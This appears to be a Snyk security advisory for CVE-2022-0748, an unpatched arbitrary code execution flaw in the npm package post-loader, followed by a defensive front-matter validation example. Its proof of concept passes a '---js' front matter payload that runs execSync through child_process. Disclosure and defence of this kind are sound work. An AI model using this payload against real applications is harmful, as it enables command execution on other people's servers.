Arbitrary Code Execution Affecting post-loader package, versions >=0.0.0
Threat Intelligence
EPSS
0.37% (73rd percentile)
- Snyk ID SNYK-JS-POSTLOADER-2403737
- published 2 Mar 2022
- disclosed 16 Feb 2022
- credit Feng Xiao and Zhongfu Su
Introduced: 16 Feb 2022
CVE-2022-0748
How to fix?
There is no fixed version for post-loader.
Overview
Affected versions of this package are vulnerable to Arbitrary Code Execution. The package uses a markdown parser in an unsafe way, so any JavaScript code inside the markdown input files gets evaluated and executed.
PoC
const postLoader = require('post-loader')
var payload = '---js\n((require("child_process")).execSync("touch rce"))';
new postLoader(payload);
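Since no fixed version exists, one mitigation is to reject markdown whose front matter fence names a language before the file reaches the loader. The following is an added example, not code from the advisory or from the post-loader project. The function names and the allow-list are assumptions, and the position of the language tag is taken from the `---js` fence in the PoC.

```javascript
// Front matter languages treated as data-only. This allow-list is an
// assumption; extend it only with formats that cannot carry code.
const ALLOWED_LANGUAGES = new Set(['', 'yaml', 'yml']);

// Return the language tag on the opening front matter fence, or null when
// the input has no front matter. '---js\n...' gives 'js'; '---\n...' gives ''.
function frontMatterLanguage(input) {
  const text = String(input).replace(/^\uFEFF/, ''); // ignore a leading BOM
  if (!text.startsWith('---')) return null;
  const firstLine = text.split(/\r?\n/, 1)[0];
  return firstLine.slice(3).trim().toLowerCase();
}

// Throw unless the markdown is acceptable to hand to the loader.
// Anything not on the allow-list is rejected (deny by default).
function assertSafeMarkdown(input) {
  const lang = frontMatterLanguage(input);
  if (lang !== null && !ALLOWED_LANGUAGES.has(lang)) {
    throw new Error(`rejected front matter language: ${JSON.stringify(lang)}`);
  }
  return input;
}

// Constructed sample inputs; the front matter bodies are inert.
const samples = [
  '# Title only\n',
  '---\ntitle: Hello\n---\nBody\n',
  '---yaml\ntitle: Hello\n---\nBody\n',
  '---js\n({ title: "Hello" })\n---\nBody\n',
  '--- JavaScript\n({ title: "Hello" })\n---\nBody\n',
];

// Map each input to 'accept' or 'reject' without stopping at the first failure.
function classify(inputs) {
  return inputs.map((s) => {
    try {
      assertSafeMarkdown(s);
      return 'accept';
    } catch (e) {
      return 'reject';
    }
  });
}

console.log(classify(samples));
```

Call `assertSafeMarkdown` on every untrusted markdown string at the point where it enters the application, and treat a rejection as an event worth logging.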
CVSS Scores
version 3.1